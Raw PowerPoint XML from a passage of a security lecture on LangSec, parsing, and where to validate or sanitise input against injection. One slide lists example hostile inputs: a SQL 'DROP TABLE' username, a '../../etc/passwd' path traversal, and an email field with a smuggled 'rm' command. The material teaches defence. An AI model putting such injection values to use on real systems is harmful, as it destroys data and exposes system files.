              <a:t>LangSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2177" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> approach: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Clear &amp; ideally language spec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Generated parser code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="259204" indent="-25920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14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Complete parsing before processing  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                           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  <a:p>
            <a:pPr lvl="1" indent="0"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rest of the program only handles well-formed data structures produced by parser</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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ight Arrow 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EE72734-5A1A-411E-C42A-AF24C68FFCCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3995936" y="2114352"/>
            <a:ext cx="216024" cy="27067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FD4DE-612D-A3E1-1E6B-E5014D3B962C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2206950" y="176148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NL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02086-D0E2-9555-C119-25BE006DAD52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4241264" y="1969527"/>
            <a:ext cx="220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Some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struct,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Java/C++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object,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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or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endParaRPr lang="en-NL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361B79-B72E-B17D-1C27-43DFCA14E7D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099795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BA2EE570-2ACC-7EF1-B8FB-B5F8E9B9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LangSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> in slogans</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46083" name="Content Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAD26967-B0A6-EDA6-0B88-4B81D84ED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121570"/>
            <a:ext cx="6571079" cy="491756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C46F2-DED4-0AEC-17BD-83BEAF9E92E2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12745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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A5F8FDF-5743-DA4F-DE68-A7D83831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7" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF37E037-73A4-ABE7-81B2-DA5321585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>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331640" y="1121570"/>
            <a:ext cx="6583680" cy="4104000"/>
          </a:xfrm>
        </p:spPr>
      </p:pic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25F71DA8-FF2A-5AB4-202E-6B41329C7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dirty="0"/>
              <a:t>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B4B7254-CFC7-BEDD-3171-8A0C4CD51734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460699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DDB141F-3476-BF23-75F7-AAF24C3B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 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1DA3-1422-5E3F-A0A1-FB226BF7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sz="1800" dirty="0"/>
              <a:t>Minimise the resources &amp; computing power that input handling gives to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1"/>
              <a:t>attackers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t>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D00C5016-B534-3159-288B-4114A505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1" y="1273321"/>
            <a:ext cx="7387200" cy="30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D971D-2EDC-C25A-C3C2-2E6302F9FC25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776477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DBC6AC-B514-0471-A4FA-034742A63930}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="652321" y="1012681"/>
            <a:ext cx="7839360" cy="51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1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>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" sz="1814" kern="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" kern="0" dirty="0" err="1"/>
              <a:t>All</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" kern="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" kern="0" dirty="0" err="1"/>
              <a:t>parsers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" kern="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" kern="0" dirty="0" err="1"/>
              <a:t>should</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" kern="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" kern="0" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" kern="0" dirty="0"/>
              <a:t> equivalent.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" kern="0" dirty="0"/>
              <a:t>And parsers should be the exact inverse of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pretty printers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" kern="0" dirty="0"/>
              <a:t>aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unparsers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1814" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49155" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F668DB4-8EB4-FE21-94CC-D64A3B71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49156" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{620DAAA7-6CB4-52ED-226F-5A185FA38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200" y="894601"/>
            <a:ext cx="6065280" cy="364032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AB681-7CAC-5064-84BE-9C7292675804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E61BF67-ACF3-4BC0-8580-DE31188868CD}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>65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90744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C0765-7C05-D2F6-1CD0-865CFC6BC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35" y="1344511"/>
            <a:ext cx="8712968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III.     How (not) to prevent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unintended/unwanted parsing,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i.e. injection attacks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1EE0E9-D1C5-AF9A-9F1F-A9BED74F7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08AC-EB66-EADF-9D8D-144D2CF4367C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kern="12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fld id="{3252218E-0481-4205-9DD0-7FB663384F66}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Afbeelding 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB85A4AB-1846-A88A-E420-A9A8DDEF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87" y="3212896"/>
            <a:ext cx="5976664" cy="18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6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How</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to prevent injection attacks?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Suppose we are worried about SQL injection via a website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Should we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>validate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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sanitise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>both </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to prevent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SLQi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>if so, where?  At point A or B?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>We assume we know a perfect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>allow-list </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deny-list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t> of dangerous characters for SQL injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>We ignore </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>canonicalisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t> of name &amp; address.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>We ignore validation to make sure that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>eg.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t> the address exists.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="5715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67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932623" y="1164866"/>
            <a:ext cx="6951745" cy="1317191"/>
            <a:chOff x="936309" y="1103696"/>
            <a:chExt cx="6951745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09" y="1465363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1739854" y="1709232"/>
              <a:ext cx="1307176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545635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5" name="Staande oorkonde 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1797864" y="1006486"/>
            <a:ext cx="1205560" cy="709008"/>
          </a:xfrm>
          <a:prstGeom prst="vertic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6" charset="0"/>
              </a:rPr>
              <a:t>- name </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0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6" charset="0"/>
              </a:rPr>
              <a:t>- address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itchFamily="16" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Vrije vorm 2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6339826" y="1823461"/>
            <a:ext cx="243013" cy="4045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>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold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25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Input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>validation 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980728"/>
            <a:ext cx="7918648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Input  validation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>, i.e. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rejecting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> weird characters at point </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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endParaRPr lang="en-GB" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0"/>
              <a:t>Pros?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Eliminates problem at the source root, so application only has to deal with ‘clean’ data  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0"/>
              <a:t>Cons?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>We may reject legitimate inputs, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>  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’s-Hertogenbosch</a:t>
            </a:r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68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1191310" y="1103696"/>
            <a:ext cx="6549042" cy="1317191"/>
            <a:chOff x="1191310" y="1103696"/>
            <a:chExt cx="6549042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10" y="1455047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2067830" y="1709232"/>
              <a:ext cx="979200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397933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16" name="Vrije vorm 15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Input  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sanitisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" alt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836712"/>
            <a:ext cx="7918648" cy="54116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Input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sanitisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>, e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>escaping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> weird characters </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>at point </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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err="1"/>
              <a:t>Eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> replacing 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800" dirty="0"/>
              <a:t> with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/>
              <a:t>Pros?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Eliminates problem at the source root, so application only has to deal with ‘harmless’ data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We no longer reject legitimate input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/>
              <a:t>Cons?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We have some data in escaped form,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\’s-Hertogenbosch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>and may need to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>un-escape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> it later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Also, what if there are more back-end than just SQL dataset?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69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Groep 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1191310" y="1103696"/>
            <a:ext cx="6549042" cy="1317191"/>
            <a:chOff x="1191310" y="1103696"/>
            <a:chExt cx="6549042" cy="131719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17184" y="1677385"/>
              <a:ext cx="1026720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10" y="1455047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2067830" y="1709232"/>
              <a:ext cx="979200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495326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809365" y="1810032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125174" y="1103696"/>
              <a:ext cx="2139479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</a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Rechthoek 43"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4896013" y="1555349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3123255" y="1555349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6342419" y="1350612"/>
              <a:ext cx="1397933" cy="1070275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16" name="Vrije vorm 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3501169" y="1778424"/>
            <a:ext cx="1423275" cy="548333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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" alt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A31D9F-E20A-03D4-CE57-7ED8DC2FEAF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1115616" y="1439464"/>
            <a:ext cx="6723983" cy="3416176"/>
            <a:chOff x="1277335" y="1653956"/>
            <a:chExt cx="6723983" cy="3416176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5069124" y="1793478"/>
              <a:ext cx="1301697" cy="1051578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Web</a:t>
              </a:r>
            </a:p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server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6699622" y="1653956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6900253" y="2331937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6699621" y="2843418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5079203" y="2438538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9707" name="Vrije vorm 20"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="21378049">
              <a:off x="2507579" y="2517854"/>
              <a:ext cx="2915620" cy="2462905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5057078" y="411816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5152849" y="3393120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5059738" y="372877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4909357" y="4483303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166314" y="1999702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6760661" y="2883243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6943912" y="2386834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6740941" y="1877460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41" y="1884438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xplosie 2 65">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B49AB2F-D689-56A6-A2A2-1FAA4EE4973D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6670540" y="1793400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0245B2BA-2FDB-F68B-6970-547804D9A877}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6862235" y="2326869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4DD17A6F-991D-D5BA-090E-77536D734564}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6654231" y="2768584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6" name="Rechte verbindingslijn met pijl 2"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6225308" y="2766728"/>
              <a:ext cx="573147" cy="21571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240968" y="2478059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77FCD6-7623-8979-B817-77745D55B0DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="683568" y="5317139"/>
            <a:ext cx="736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Big attack surface in application, the underlying protocol stack,  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and external services.</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL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329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55576" y="1103775"/>
            <a:ext cx="7993497" cy="49601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	 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i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Different</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> escaping needed to prevent SQLi, XSS, path traversal, OS command injection, …  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>Eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t> SQL database may be attacked with username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Bobby; DROP TABLE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GB" sz="1600" dirty="0"/>
              <a:t>but file system with username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../../etc/passwd                               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>and email program with username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john@ru.nl; &amp; rm –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For most systems, it’s a fallacy to think that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>one</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  input sanitisation routine can solve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  injection problems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845345"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ultiple backends/APIs introduce multiple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>contexts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" alt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C3568-B447-A3C7-D0F9-92BB7EC0377E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1187624" y="1306051"/>
            <a:ext cx="6583037" cy="2174030"/>
            <a:chOff x="739364" y="972511"/>
            <a:chExt cx="6583037" cy="2174030"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Afgeronde rechthoek 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2385687" y="1267397"/>
              <a:ext cx="1956004" cy="131719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OnlineShop.nl</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="28" name="Groep 27"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="2175577">
              <a:off x="4277105" y="2463246"/>
              <a:ext cx="865609" cy="384481"/>
              <a:chOff x="5362575" y="1660585"/>
              <a:chExt cx="865609" cy="384481"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29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30" name="Rechthoek 29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32" name="Rechthoek 31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64" y="1478401"/>
              <a:ext cx="751014" cy="74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 bwMode="auto">
            <a:xfrm>
              <a:off x="1653857" y="1772670"/>
              <a:ext cx="711714" cy="262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 rot="19546669">
              <a:off x="4298634" y="1397687"/>
              <a:ext cx="865609" cy="384481"/>
              <a:chOff x="5362575" y="1660585"/>
              <a:chExt cx="865609" cy="384481"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35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26" name="Rechthoek 25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27" name="Rechthoek 26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sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Rechthoek 43"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3949985" y="1708041"/>
              <a:ext cx="368640" cy="515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B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2380421" y="1701590"/>
              <a:ext cx="381600" cy="52662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</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2" name="Stroomdiagram: Magnetische schijf 1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5146889" y="972511"/>
              <a:ext cx="1194784" cy="844830"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartMagneticDisk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customer database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3" name="Afgeronde rechthoek 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5146889" y="2763744"/>
              <a:ext cx="1547371" cy="382797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file system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8" name="Afgeronde rechthoek 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
